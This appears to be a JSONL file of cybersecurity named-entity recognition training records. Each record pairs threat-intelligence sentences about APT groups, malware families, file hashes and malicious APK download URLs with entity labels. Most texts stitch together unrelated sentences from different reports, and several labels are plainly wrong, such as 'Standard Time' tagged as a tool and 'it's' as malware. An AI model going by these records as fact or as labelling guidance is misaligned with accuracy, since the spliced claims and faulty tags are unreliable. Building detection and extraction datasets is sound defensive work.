{"text": "] com overlaps with PlugX , Zupdax , and Poison Ivy malware families discussed in more detail later . In spring 2015 , APT41 targeted information related to two entities undergoing a merger announced the previous year . Some of APT28 's more commonly used tools are the SOURFACE downloader , its second stage backdoor EVILTOSS , and a modular family of implants that we call CHOPSTICK .", "spans": {"MALWARE: PlugX": [[20, 25]], "MALWARE: Zupdax": [[28, 34]], "MALWARE: Poison Ivy": [[41, 51]], "THREAT_ACTOR: APT41": [[119, 124]], "THREAT_ACTOR: APT28": [[228, 233]], "MALWARE: SOURFACE downloader": [[270, 289]], "MALWARE: EVILTOSS": [[318, 326]], "MALWARE: modular family of implants": [[335, 361]], "MALWARE: CHOPSTICK": [[375, 384]]}, "info": {"id": "cyberner_stix_train_007411", "source": "cyberner_stix_train"}}
{"text": "Given that there are a limited number of behaviors required to identify billing fraud , Bread apps have had to try a wide variety of techniques to mask usage of these APIs . Government officials said they knew the initial attack occurred in 2011 , but are unaware of who specifically is behind the attacks . PortScan Run TCP Port MultiScanner v1.0 . Attribution to the Dukes was made partly on the LNK file structure and other TTPs , including the targets of the attack .", "spans": {"MALWARE: Bread": [[88, 93]], "ORGANIZATION: Government officials": [[174, 194]], "THREAT_ACTOR: Dukes": [[369, 374]]}, "info": {"id": "cyberner_stix_train_007412", "source": "cyberner_stix_train"}}
{"text": "MainService has the following capabilities : Steal SMS messages Send SMS messages Steal the victim 's location Capture photos Execute commands Capture screenshots Call phone numbers Initiate other apps Steal Facebook credentials , etc All of the above functionalities take place on the basis of commands sent by the attacker . During this attack , the Bemstour exploit tool was delivered to victims via known Buckeye malware (Backdoor.Pirpi) . The group likely consists of Russian pro-hacktivists .", "spans": {"SYSTEM: Facebook": [[208, 216]], "TOOL: Buckeye malware": [[409, 424]]}, "info": {"id": "cyberner_stix_train_007413", "source": "cyberner_stix_train"}}
{"text": "In my previous blog I posted details of a cyber attack targeting Indian government organizations .", "spans": {"ORGANIZATION: Indian government organizations": [[65, 96]]}, "info": {"id": "cyberner_stix_train_007414", "source": "cyberner_stix_train"}}
{"text": "This is not the first instance of an adversary group using recent current events as a lure , but it is interesting to see this group attempt to capitalize on the attention of a catastrophic event to execute their attack .", "spans": {}, "info": {"id": "cyberner_stix_train_007416", "source": "cyberner_stix_train"}}
{"text": "Indeed , Kaspersky started tracking the BlueNoroff actor a long time ago . The earliest step in any possible attack(s) involving this variant of KopiLuwak of which Proofpoint researchers are currently aware begin with the MSIL dropper .", "spans": {"ORGANIZATION: Kaspersky": [[9, 18]], "THREAT_ACTOR: BlueNoroff": [[40, 50]], "FILEPATH: KopiLuwak": [[145, 154]], "FILEPATH: MSIL dropper": [[222, 234]]}, "info": {"id": "cyberner_stix_train_007417", "source": "cyberner_stix_train"}}
{"text": "During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros . We can see that the malware relies on bash shell for most of its setup .", "spans": {"THREAT_ACTOR: APT32": [[27, 32]], "MALWARE: Microsoft ActiveMime file": [[74, 99]], "MALWARE: malware": [[162, 169]]}, "info": {"id": "cyberner_stix_train_007418", "source": "cyberner_stix_train"}}
{"text": "In our tests , the malware sample was able to easily detect both VMWare and Hyper-V environments through the detection of the virtualized peripherals ( for example , Vmware has VEN_15AD as vendor ID , HyperV has VMBus as bus name ) . FireEye asesses that APT32 actors may be aligned with the national interests of Vietnam . It arrives together with an encrypted payload stored in a separate .png image file . Data transfer to a thirdparty tool may be authorized , but it may not be common practice to continuously ping internal servers for external data transfer requests .", "spans": {"SYSTEM: VMWare": [[65, 71]], "SYSTEM: Hyper-V": [[76, 83]], "ORGANIZATION: Vmware": [[166, 172]], "ORGANIZATION: FireEye": [[234, 241]], "THREAT_ACTOR: APT32 actors": [[255, 267]]}, "info": {"id": "cyberner_stix_train_007419", "source": "cyberner_stix_train"}}
{"text": "Responder facilitates NetBIOS Name Service ( NBT-NS ) poisoning .", "spans": {"TOOL: Responder": [[0, 9]], "TOOL: NetBIOS Name Service": [[22, 42]], "TOOL: NBT-NS": [[45, 51]]}, "info": {"id": "cyberner_stix_train_007420", "source": "cyberner_stix_train"}}
{"text": "This corresponds to working hours between 9am and 7pm in the UTC+3 time zone , also known as Moscow Standard Time , which covers , among others , much of western Russia , including Moscow and St. Petersburg .", "spans": {"TOOL: Standard Time": [[100, 113]]}, "info": {"id": "cyberner_stix_train_007421", "source": "cyberner_stix_train"}}
{"text": "Remove unnecessary HTTP verbs from web servers .", "spans": {"TOOL: web servers": [[35, 46]]}, "info": {"id": "cyberner_stix_train_007422", "source": "cyberner_stix_train"}}
{"text": "So the system doesn ’ t see any strange processes running and thus does not cry the alarm . The other one , \" Operation Erebus \" employs an older exploit , for CVE-2016-4117 and leverages watering holes . The registrant information for kernel.ws also provided a geolocation of Tehran , IR and the email provider for the address used in checkgoogle.org was the same used for mydomain1607.com , chmail.ir .", "spans": {"VULNERABILITY: CVE-2016-4117": [[160, 173]], "ORGANIZATION: email provider": [[297, 311]]}, "info": {"id": "cyberner_stix_train_007423", "source": "cyberner_stix_train"}}
{"text": "Malicious URL Referrer Dates http : //217.194.13.133/tre/internet/Configuratore_3.apk http : //217.194.13.133/tre/internet/ 2015-02-04 to present time http : //217.194.13.133/appPro_AC.apk – 2015-07-01 http : //217.194.13.133/190/configurazione/vodafone/smartphone/VODAFONE % 20Configuratore % 20v5_4_2.apk http : //217.194.13.133/190/configurazione/vodafone/smartphone/index.html In order to understand SWAnalytics’ impact , we turned to public download volume data available on Chandashi , one of the app store optimization vendors specialized in Chinese mobile application markets . APT1 : Comment Crew , Comment Group , Comment Panda .", "spans": {"MALWARE: SWAnalytics’": [[404, 416]], "THREAT_ACTOR: APT1": [[586, 590]], "THREAT_ACTOR: Comment Crew": [[593, 605]], "THREAT_ACTOR: Comment Group": [[608, 621]], "THREAT_ACTOR: Comment Panda": [[624, 637]]}, "info": {"id": "cyberner_stix_train_007424", "source": "cyberner_stix_train"}}
{"text": "This story is about one of those cases .", "spans": {}, "info": {"id": "cyberner_stix_train_007425", "source": "cyberner_stix_train"}}
{"text": "This particular threat was also used by hackers to compromise a Korean social network site to steal records of 35 million users .", "spans": {}, "info": {"id": "cyberner_stix_train_007426", "source": "cyberner_stix_train"}}
{"text": "https : //github.com/El3ct71k/Keylogger/ It appears the developers have copied the functional part of the keylogger module from this project . Operation Sheep is the first campaign we have observed in the wild that abuses similar concept since our MitD publication . Machete is a group that has been active since at least 2010 , targeting high-profile government entities in Latin American countries .", "spans": {"THREAT_ACTOR: Operation Sheep": [[143, 158]], "THREAT_ACTOR: Machete": [[267, 274]]}, "info": {"id": "cyberner_stix_train_007427", "source": "cyberner_stix_train"}}
{"text": "After the attackers successfully exploited the employee ’s system , they gained access to the e-commerce company 's internal network .", "spans": {}, "info": {"id": "cyberner_stix_train_007429", "source": "cyberner_stix_train"}}
{"text": "Most legitimate Android apps are available on the Google Play Store . Once BARIUM has established rapport , they spear-phish the victim using a variety of unsophisticated malware installation vectors , including malicious shortcut ( .lnk ) files with hidden payloads , compiled HTML help ( .chm ) files , or Microsoft Office documents containing macros or exploits . The download name was \" Zawgyi_Keyboard_L.zip \" , and it dropped a \" setup.exe \" that contained several backdoor components , including an Elise \" wincex.dll \" ( a42c966e26f3577534d03248551232f3 , detected as Backdoor.Win32.Agent.delp ) .", "spans": {"SYSTEM: Android": [[16, 23]], "SYSTEM: Google Play Store": [[50, 67]], "TOOL: unsophisticated malware": [[155, 178]], "TOOL: malicious shortcut": [[212, 230]], "MALWARE: .lnk": [[233, 237]], "TOOL: HTML help ( .chm ) files": [[278, 302]], "TOOL: Microsoft Office documents": [[308, 334]], "FILEPATH: Zawgyi_Keyboard_L.zip": [[391, 412]], "FILEPATH: setup.exe": [[436, 445]], "MALWARE: Elise": [[506, 511]], "FILEPATH: wincex.dll": [[514, 524]], "FILEPATH: a42c966e26f3577534d03248551232f3": [[529, 561]], "MALWARE: Backdoor.Win32.Agent.delp": [[576, 601]]}, "info": {"id": "cyberner_stix_train_007430", "source": "cyberner_stix_train"}}
{"text": "At the same time , the domain admin.nslookupdns [ . Once in a victim organization , APT41 can leverage more sophisticated TTPs and deploy additional malware . Since at least 2014 , FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam 's manufacturing , consumer products , and hospitality sectors .", "spans": {"THREAT_ACTOR: APT41": [[84, 89]], "ORGANIZATION: FireEye": [[181, 188]], "THREAT_ACTOR: APT32": [[202, 207]], "ORGANIZATION: foreign corporations": [[218, 238]], "ORGANIZATION: manufacturing": [[276, 289]], "ORGANIZATION: consumer products": [[292, 309]], "ORGANIZATION: hospitality sectors": [[316, 335]]}, "info": {"id": "cyberner_stix_train_007431", "source": "cyberner_stix_train"}}
{"text": "This indicates that the app tries to hide itself from any anti-PHA systems that look for a specific app process name or does not have the ability to scan the memory of the system_server process . The Sogu gang , in contrast , use PDF and DOC files in very tailored , targeted emails . BLACKCOFFEE ’s functionality includes uploading and downloading files ; creating a reverse shell ; enumerating files and processes ; renaming , moving , and deleting files ; terminating processes ; and expanding its functionality by adding new backdoor commands . The PDFs were highly relevant and well - crafted content that fabricated human rights seminar information ( ASEM ) and Ukraine - s foreign policy and NATO membership plans .", "spans": {"TOOL: PDF": [[230, 233]], "TOOL: DOC files": [[238, 247]], "MALWARE: BLACKCOFFEE": [[285, 296]]}, "info": {"id": "cyberner_stix_train_007432", "source": "cyberner_stix_train"}}
{"text": "CraP2P has frequently been used to distribute other malware such as Locky and Dridex , but also supported large scale spam campaigns for dating advertisement and pump-and-dump scams after the demise of Kelihos . While investigating a 2016 intrusion , Secureworks incident responders identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization .", "spans": {"MALWARE: CraP2P": [[0, 6]], "TOOL: Locky": [[68, 73]], "TOOL: Dridex": [[78, 84]], "ORGANIZATION: Secureworks": [[251, 262]], "THREAT_ACTOR: BRONZE BUTLER": [[294, 307]], "VULNERABILITY: CVE-2016-7836": [[374, 387]]}, "info": {"id": "cyberner_stix_train_007433", "source": "cyberner_stix_train"}}
{"text": "Release_Time : 2015-09", "spans": {}, "info": {"id": "cyberner_stix_train_007434", "source": "cyberner_stix_train"}}
{"text": "This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx” . LuckyMouse , also known as Iron Tiger , EmissaryPanda , APT 27 and Threat Group-3390 , is the same group of Chinese hackers who was found targeting Asian countries with Bitcoin mining malware early this year .", "spans": {"MALWARE: document": [[34, 42]], "VULNERABILITY: Trump's_Attack_on_Syria_English.docx”": [[49, 86]], "THREAT_ACTOR: LuckyMouse": [[89, 99]], "THREAT_ACTOR: Iron Tiger": [[116, 126]], "THREAT_ACTOR: EmissaryPanda": [[129, 142]], "THREAT_ACTOR: APT 27": [[145, 151]], "THREAT_ACTOR: Threat Group-3390": [[156, 173]], "MALWARE: Bitcoin mining malware": [[258, 280]]}, "info": {"id": "cyberner_stix_train_007435", "source": "cyberner_stix_train"}}
{"text": "At the time of detection , observed BRONZE PRESIDENT incidents had likely been ongoing for several months or even years .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[36, 52]]}, "info": {"id": "cyberner_stix_train_007436", "source": "cyberner_stix_train"}}
{"text": "CTU researchers assess with moderate confidence that TG-3390 is based in the People's Republic of China .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: TG-3390": [[53, 60]], "ORGANIZATION: People's Republic": [[77, 94]]}, "info": {"id": "cyberner_stix_train_007437", "source": "cyberner_stix_train"}}
{"text": "Without context , this method does not reveal much about its intended behavior , and there are no calls made to it anywhere in the DEX . In June we published on a previously unknown group we named \" Bahamut \" , a strange campaign of phishing and malware apparently focused on the Middle East and South Asia . Further , the keylogging and remote desktop functionality allows the operator to spy on the infected machine , observing all keystrokes and viewing all user actions . It allows security researchers to analyze the source code and understand the attacker ’s tactics , techniques and procedures ( TTPs ) , which helps security professionals develop effective detection rules and enhance security products ' capabilities in combating ransomware threats .", "spans": {"THREAT_ACTOR: Bahamut": [[199, 206]]}, "info": {"id": "cyberner_stix_train_007438", "source": "cyberner_stix_train"}}
{"text": "Sofacy AZZY 4.3 dropper analysis File format : PE32 EXE File size : 142,336 bytes MD5: c3ae4a37094ecfe95c2badecf40bf5bb Linker version : 11.0 , Microsoft Visual Studio Linker timestamp : 2015.02.10 10:01:59 ( GMT ) Most of the strings and data in the file are encrypted using 3DES and XOR .", "spans": {"THREAT_ACTOR: Sofacy": [[0, 6]], "MALWARE: AZZY": [[7, 11]], "TOOL: EXE": [[52, 55]], "FILEPATH: c3ae4a37094ecfe95c2badecf40bf5bb": [[87, 119]], "ORGANIZATION: Microsoft": [[144, 153]], "TOOL: Visual Studio": [[154, 167]], "TOOL: GMT": [[209, 212]]}, "info": {"id": "cyberner_stix_train_007439", "source": "cyberner_stix_train"}}
{"text": "If an automated sandbox exits its analysis session without specifically closing out the document , the sandbox may miss the malicious activity entirely .", "spans": {}, "info": {"id": "cyberner_stix_train_007440", "source": "cyberner_stix_train"}}
{"text": "Incident Background Beginning on Oct. 24 at 08:00 UTC , FireEye detected and blocked attempts to infect multiple clients with a drive-by download masquerading as a Flash Update install_flash_player.exe that delivered a wormable variant of ransomware . The HTA files contained job descriptions and links to job postings on popular employment websites .", "spans": {"ORGANIZATION: FireEye": [[56, 63]], "MALWARE: install_flash_player.exe": [[177, 201]], "MALWARE: ransomware": [[239, 249]], "FILEPATH: HTA files": [[256, 265]]}, "info": {"id": "cyberner_stix_train_007441", "source": "cyberner_stix_train"}}
{"text": "Users are recommended to install apps from authorized stores such as Google Play , disable installation of apps from 'Unknown Sources ' and for a better security install a reputed security application . According to 360 Threat Intelligence Center , Goldmouse was observed deploying the nebulous njRAT backdoor . Beachhead backdoors are typically minimally featured . They 're mostly located in South East Asia , but are also in the US , Germany , Japan , China , Russia , Brazil , Peru , and Belarus , according to a release published Thursday by researchers from antivirus provider Kaspersky Lab .", "spans": {"SYSTEM: Google Play": [[69, 80]], "ORGANIZATION: 360 Threat Intelligence Center": [[216, 246]], "TOOL: njRAT backdoor": [[295, 309]], "ORGANIZATION: antivirus provider": [[564, 582]], "ORGANIZATION: Kaspersky Lab": [[583, 596]]}, "info": {"id": "cyberner_stix_train_007442", "source": "cyberner_stix_train"}}
{"text": "As with much of the malware distributed by TA505 , The Trick has appeared in frequent , high-volume campaigns .", "spans": {"THREAT_ACTOR: TA505": [[43, 48]], "MALWARE: Trick": [[55, 60]]}, "info": {"id": "cyberner_stix_train_007443", "source": "cyberner_stix_train"}}
{"text": "The contents above use the DDE functionality in Microsoft Word to run a PowerShell script to download the Koadic payload from a remote server , save it as an executable file on the system and then execute the payload .", "spans": {"ORGANIZATION: Microsoft": [[48, 57]], "TOOL: Word": [[58, 62]], "TOOL: PowerShell": [[72, 82]], "TOOL: Koadic": [[106, 112]]}, "info": {"id": "cyberner_stix_train_007444", "source": "cyberner_stix_train"}}
{"text": "TA505 first introduced Rockloader in April 2016 as an intermediate loader for Locky .", "spans": {"THREAT_ACTOR: TA505": [[0, 5]], "MALWARE: Rockloader": [[23, 33]], "TOOL: loader": [[67, 73]], "MALWARE: Locky": [[78, 83]]}, "info": {"id": "cyberner_stix_train_007445", "source": "cyberner_stix_train"}}
{"text": "We have previously detected groups we suspect are affiliated with the North Korean government compromising electric utilities in South Korea , but these compromises did not lead to a disruption of the power supply . Unit 42 recently identified a targeted attack against an individual working for the Foreign Ministry of Uzbekistan in China .", "spans": {"THREAT_ACTOR: groups": [[28, 34]], "ORGANIZATION: government": [[83, 93]], "ORGANIZATION: electric": [[107, 115]], "ORGANIZATION: Unit 42": [[216, 223]], "ORGANIZATION: Foreign Ministry": [[300, 316]]}, "info": {"id": "cyberner_stix_train_007447", "source": "cyberner_stix_train"}}
{"text": "Once it infects a device , Wroba behaves very aggressively . Even an experienced user can be fooled by downloading a malicious file that is apparently from adobe.com , since the URL and the IP address correspond to Adobe 's legitimate infrastructure . It allocates a buffer of 0x2800 bytes and copies the code for the ZxGetLibAndProcAddr function . Instead , it appeared that corresponding requests were made directly through the Outlook Web Application ( OWA ) endpoint , indicating a previously undisclosed exploit method for Exchange .", "spans": {"MALWARE: Wroba": [[27, 32]], "MALWARE: malicious file": [[117, 131]]}, "info": {"id": "cyberner_stix_train_007448", "source": "cyberner_stix_train"}}
{"text": "com.mbv.a.wp 01611e16f573da2c9dbc7acdd445d84bae71fecf2927753e341d8a5652b89a68 com.pho.nec.sg b4822eeb71c83e4aab5ddfecfb58459e5c5e10d382a2364da1c42621f58e119b Exobot ( Marcher ) - Android banking Trojan on the rise February 2017 Introduction The past months many different banking Trojans for Following their activities and evolving tactics and techniques helped us uncover the proverbial red string of fate that connected three seemingly disparate campaigns : PLEAD , Shrouded Crossbow , and of late , Waterbear . The next most common is port 53 . The operation and the key are different throughout the strings so , the best option is to emulate this part to get the decoded strings .", "spans": {"MALWARE: Exobot": [[158, 164]], "MALWARE: Marcher": [[167, 174]], "SYSTEM: Android": [[179, 186]]}, "info": {"id": "cyberner_stix_train_007449", "source": "cyberner_stix_train"}}
{"text": "There were also multiple press reports of cyber-attacks on several devices during the opening ceremonies for the 2018 Olympic Games in PyeongChang .", "spans": {"ORGANIZATION: Olympic Games": [[118, 131]]}, "info": {"id": "cyberner_stix_train_007450", "source": "cyberner_stix_train"}}
{"text": "We assume that these modifications were performed to avoid detection based on public IOCs .", "spans": {}, "info": {"id": "cyberner_stix_train_007451", "source": "cyberner_stix_train"}}
{"text": "] 205 7ed754a802f0b6a1740a99683173db73 com.psiphon3 dexlib 2.x 188.165.49 [ . If it's Cyrillic and the command to the shell is not ‘ipconfig’ , the threat converts the command result text encoding from Cyrillic to UTF-16 . The final payload created by the aforementioned process is a well known backdoor , also known as ROKRAT by Cisco Talos .", "spans": {"MALWARE: it's": [[81, 85]], "TOOL: Cyrillic": [[86, 94]], "TOOL: UTF-16": [[214, 220]], "MALWARE: ROKRAT": [[320, 326]], "ORGANIZATION: Cisco Talos": [[330, 341]]}, "info": {"id": "cyberner_stix_train_007452", "source": "cyberner_stix_train"}}
{"text": "Allows an application to receive SMS messages . Such is the scale of the CIA's undertaking that by 2016 , its hackers had utilized more code than that used to run Facebook . The group has targeted multiple private sector industries as well as with foreign governments , dissidents , and journalists with a strong focus on Southeast Asian countries like Vietnam , the Philippines , Laos , and Cambodia .", "spans": {"THREAT_ACTOR: hackers": [[110, 117]]}, "info": {"id": "cyberner_stix_train_007453", "source": "cyberner_stix_train"}}
{"text": "The password to extract the 7zip file is included in the email .", "spans": {"TOOL: 7zip": [[28, 32]], "TOOL: email": [[57, 62]]}, "info": {"id": "cyberner_stix_train_007454", "source": "cyberner_stix_train"}}
{"text": "FireEye recently observed a sophisticated campaign targeting individuals within the Mongolian government .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "ORGANIZATION: Mongolian government": [[84, 104]]}, "info": {"id": "cyberner_stix_train_007455", "source": "cyberner_stix_train"}}
{"text": "MISLEADING USERS Bread apps sometimes display a pop-up to the user that implies some form of compliance or disclosure , showing terms and conditions or a confirm button . The second method , described in Part D.2 , below , involves the \" ShadowPad \" malware , which the Barium Defendants have distributed via a third-party software provider 's compromised update . Command and Control Server : Sample ( SHA256 : 1eda7e556181e46ba6e36f1a6bfe18ff5566f9d5e51c53b41d08f9459342e26c ) is configured to act as a server . Please address comments about this page to nvd@nist.gov .", "spans": {"MALWARE: Bread": [[17, 22]], "TOOL: ShadowPad": [[238, 247]], "THREAT_ACTOR: Barium": [[270, 276]], "ORGANIZATION: third-party software provider": [[311, 340]], "TOOL: Command and Control": [[365, 384]], "FILEPATH: 1eda7e556181e46ba6e36f1a6bfe18ff5566f9d5e51c53b41d08f9459342e26c": [[412, 476]], "ORGANIZATION: nvd@nist.gov": [[557, 569]]}, "info": {"id": "cyberner_stix_train_007456", "source": "cyberner_stix_train"}}
{"text": "The grabScreenPin method has separate conditioning to handle screen lock events in Samsung devices . The malware starts communicating with the C&C server by sending basic information about the infected machine . The survey contained macros that , once enabled , downloaded PupyRAT .", "spans": {"ORGANIZATION: Samsung": [[83, 90]], "MALWARE: malware": [[105, 112]], "MALWARE: PupyRAT": [[273, 280]]}, "info": {"id": "cyberner_stix_train_007457", "source": "cyberner_stix_train"}}
{"text": "“ Agent Smith ” is possibly the first campaign seen that ingrates and weaponized all these loopholes and are described in detail below . The developers of Bookworm have gone to great lengths to create a modular framework that is very flexible through its ability to run additional modules directly from its C2 server . Intent was clearly espionage in many cases , going outside of that \"lawful surveillance\" boundary.— Brian Bartholomew ( @Mao_Ware ) October 16, 2017 Brian Bartholomew , a senior security researcher with Kaspersky , said on Twitter that BlackOasis ’ espionage included non-traditional targets — “ going outside of that lawful surveillance boundary. ” RTM used Port 44443 for its VNC module .", "spans": {"MALWARE: Agent Smith": [[2, 13]], "TOOL: Bookworm": [[155, 163]], "ORGANIZATION: Kaspersky": [[522, 531]], "TOOL: Twitter": [[542, 549]], "THREAT_ACTOR: BlackOasis": [[555, 565]], "THREAT_ACTOR: RTM": [[669, 672]], "SYSTEM: VNC module": [[697, 707]]}, "info": {"id": "cyberner_stix_train_007458", "source": "cyberner_stix_train"}}
{"text": "If the lateral movement with credentials fails , then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue , and uses it to spread to that host . This confirms the actors are using Poison Ivy as part of their toolkit , something speculated in the original Trend Micro report but not confirmed by them .", "spans": {"TOOL: PingCastle MS17-010": [[71, 90]], "VULNERABILITY: EternalBlue": [[218, 229]], "MALWARE: Poison Ivy": [[304, 314]], "ORGANIZATION: Trend Micro": [[379, 390]]}, "info": {"id": "cyberner_stix_train_007459", "source": "cyberner_stix_train"}}
{"text": "Known for hijacking prominent social media accounts , the self-styled white hat hacking group OurMine took over a number of verified Twitter and Facebook accounts belonging to the cable network . In the same year , Silence conducted DDoS attacks using the Perl IRC bot and public IRC chats to control Trojans .", "spans": {"ORGANIZATION: social media": [[30, 42]], "ORGANIZATION: Twitter": [[133, 140]], "ORGANIZATION: Facebook": [[145, 153]], "MALWARE: Perl IRC bot": [[256, 268]], "MALWARE: public IRC chats": [[273, 289]]}, "info": {"id": "cyberner_stix_train_007460", "source": "cyberner_stix_train"}}
{"text": "The bitreeview.aspx file is a variant of the AntSword webshell that has undeniably similar traits as the infamous China Chopper webshell .", "spans": {"FILEPATH: bitreeview.aspx": [[4, 19]], "TOOL: AntSword": [[45, 53]], "TOOL: Chopper": [[120, 127]]}, "info": {"id": "cyberner_stix_train_007461", "source": "cyberner_stix_train"}}
{"text": "Winexe is software similar to the more popular PSExec and is designed to allow system administrators to execute commands on remote servers .", "spans": {"TOOL: Winexe": [[0, 6]], "TOOL: PSExec": [[47, 53]]}, "info": {"id": "cyberner_stix_train_007462", "source": "cyberner_stix_train"}}
{"text": "KrebsOnSecurity was first made aware of the metadata in the Shadow Brokers leak by Mike Poor , Rob Curtinseufert , and Larry Pesce . A preliminary analysis caught the attention of our Threat Analysis and Intelligence team as it yielded interesting data that , among other things , shows that Silence was targeting employees from financial entities , specifically in the Russian Federation and the Republic of Belarus .", "spans": {"ORGANIZATION: KrebsOnSecurity": [[0, 15]], "THREAT_ACTOR: Shadow Brokers": [[60, 74]], "ORGANIZATION: employees": [[314, 323]], "ORGANIZATION: financial entities": [[329, 347]]}, "info": {"id": "cyberner_stix_train_007463", "source": "cyberner_stix_train"}}
{"text": "Figure 8 shows a Sysdriver scheduled task that periodically executes a Cobalt Strike payload .", "spans": {"TOOL: Cobalt Strike": [[71, 84]]}, "info": {"id": "cyberner_stix_train_007464", "source": "cyberner_stix_train"}}
{"text": "It uses the same trick to prevent the smartphone from being returned to its factory settings . this attack against a Kaspersky Lab user on August 5 , 2014 . The following paper is a technical analysis on the functionality of ZxShell . In the case of a traditional ProxyNotShell exploit chain , the attack sequence is done in two steps :", "spans": {"ORGANIZATION: Kaspersky Lab": [[117, 130]], "MALWARE: ZxShell": [[225, 232]]}, "info": {"id": "cyberner_stix_train_007465", "source": "cyberner_stix_train"}}
{"text": "Serial Number : 0x6a0d1fec Issuer : CN=Sun Validity : from = Mon May 16 17:42:40 MSK 2016 to = Fri May 10 17:42:40 MSK 2041 Subject : CN=Sun 9ffc350ef94ef840728564846f2802b0 2 v2.51sun 6c246bbb40b7c6e75c60a55c0da9e2f2 2 v2.96s 7c8a12e56e3e03938788b26b84b80bd6 2 v3.09s Furthermore , the Advanced Threat Research team has discovered Proxysvc , which appears to be an undocumented implant . At this point , additional activity from the attackers continued between March 5 into April , and on April 18 at 11:50 , a second remote access tool known as DarkComet was deployed to csidl_profile\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\smss.exe on the infected computer . In its spear phish , CloudLook also used a self - extracting archive containing a PDF file that lured its victims with information regarding world terrorism .", "spans": {"ORGANIZATION: Advanced Threat Research": [[287, 311]], "TOOL: Proxysvc": [[332, 340]], "MALWARE: DarkComet": [[547, 556]], "FILEPATH: menu\\programs\\startup\\smss.exe": [[627, 657]], "MALWARE: CloudLook": [[706, 715]]}, "info": {"id": "cyberner_stix_train_007466", "source": "cyberner_stix_train"}}
{"text": "DHS and FBI are distributing these IP S-PROT addresses to enable network defense activities and reduce exposure to the DDoS command-and-control network .", "spans": {"ORGANIZATION: DHS": [[0, 3]], "ORGANIZATION: FBI": [[8, 11]], "TOOL: IP S-PROT addresses": [[35, 54]]}, "info": {"id": "cyberner_stix_train_007467", "source": "cyberner_stix_train"}}
{"text": "The leak of its code provides cybercriminals with a new weaponized resource for enhancing their surveillance operations . Symantec discovered the most recent wave of Tick attacks in July 2015 , when the group compromised three different Japanese websites with a Flash ( .swf ) exploit to mount watering hole attacks . Normally the call flow graph ( CFG ) The generic campaigns are aimed at various civilian targets in Poland and Ukraine , such as with Excel spreadsheet lures masquerading as value - added tax ( VAT ) return forms .", "spans": {"ORGANIZATION: Symantec": [[122, 130]], "THREAT_ACTOR: group": [[203, 208]], "THREAT_ACTOR: Excel spreadsheet lures masquerading": [[452, 488]], "THREAT_ACTOR: value - added tax ( VAT ) return forms": [[492, 530]]}, "info": {"id": "cyberner_stix_train_007468", "source": "cyberner_stix_train"}}
{"text": "The Honeycomb toolserver receives exfiltrated information from the implant; an operator can also task the implant to execute jobs on the target computer , so the toolserver acts as a C2 (command and control) server for the implant . The decoy documents used by the InPage exploits suggest that the targets are likely to be politically or militarily motivated .", "spans": {"MALWARE: Honeycomb": [[4, 13]], "MALWARE: decoy documents": [[237, 252]], "TOOL: InPage": [[265, 271]], "VULNERABILITY: exploits": [[272, 280]], "ORGANIZATION: politically": [[323, 334]], "ORGANIZATION: militarily": [[338, 348]]}, "info": {"id": "cyberner_stix_train_007469", "source": "cyberner_stix_train"}}
{"text": "By listing sub-folders , SWAnalytics is able to infer QQ accounts which have never been used on the device . Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 .", "spans": {"MALWARE: SWAnalytics": [[25, 36]], "THREAT_ACTOR: Patchwork": [[118, 127]], "FILEPATH: RTF files": [[154, 163]], "VULNERABILITY: CVE-2017-8570": [[175, 188]]}, "info": {"id": "cyberner_stix_train_007470", "source": "cyberner_stix_train"}}
{"text": "CrowdStrike Intelligence has recently observed PINCHY SPIDER affiliates deploying GandCrab ransomware in enterprise environments , using lateral movement techniques and tooling commonly associated with nation-state adversary groups and penetration testing teams . All the samples appear to be have been compiled between February 29 and March 1 2016 , shortly before our discovery , suggesting that , despite the known C&C servers having quickly gone offline shortly after , this spree of attacks might be fresh and currently undergoing .", "spans": {"ORGANIZATION: CrowdStrike Intelligence": [[0, 24]], "THREAT_ACTOR: PINCHY SPIDER": [[47, 60]], "TOOL: GandCrab ransomware": [[82, 101]], "TOOL: C&C": [[418, 421]]}, "info": {"id": "cyberner_stix_train_007471", "source": "cyberner_stix_train"}}
{"text": "The same is likely to be the case for com.pugna.magiccall but this is unknown currently . In May 2018 , APT41 used TeamViewer for initial entry in the compromise of a healthcare company . Based on the campaign identifiers found in PinchDuke samples discovered from 2009 , the targets of the Dukes group during that year included organizations such as the Ministry of Defense of Georgia and the ministries of foreign affairs of Turkey and Uganda .", "spans": {"THREAT_ACTOR: APT41": [[104, 109]], "TOOL: TeamViewer": [[115, 125]], "ORGANIZATION: healthcare": [[167, 177]], "ORGANIZATION: company": [[178, 185]], "MALWARE: PinchDuke samples": [[231, 248]], "THREAT_ACTOR: Dukes group": [[291, 302]], "ORGANIZATION: Ministry of Defense": [[355, 374]], "ORGANIZATION: ministries of foreign affairs": [[394, 423]]}, "info": {"id": "cyberner_stix_train_007472", "source": "cyberner_stix_train"}}
{"text": "The chat details , WhatsApp records , messengers and SMSs of the world carry some sensitive information which people often forget when communicating with their devices . In this blog post we'll analyze two specific incidents apparently targeting victims in Vietnam and in India and we'll describe the capabilities of the custom backdoor being used that for convenience ( and to our knowledge , for a lack of an existing name ) we call KeyBoy , due to a string present in one of the samples . Currently , APT12 continues to target organizations and conduct cyber operations using its new tools . 2023 - 07 - 19 Update : On June 5 , @SecurityAura described an unknown campaign using .hta payloads disguised as driver updates .", "spans": {"SYSTEM: WhatsApp": [[19, 27]], "TOOL: backdoor": [[328, 336]], "TOOL: KeyBoy": [[435, 441]], "THREAT_ACTOR: APT12": [[504, 509]], "ORGANIZATION: @SecurityAura": [[631, 644]]}, "info": {"id": "cyberner_stix_train_007473", "source": "cyberner_stix_train"}}
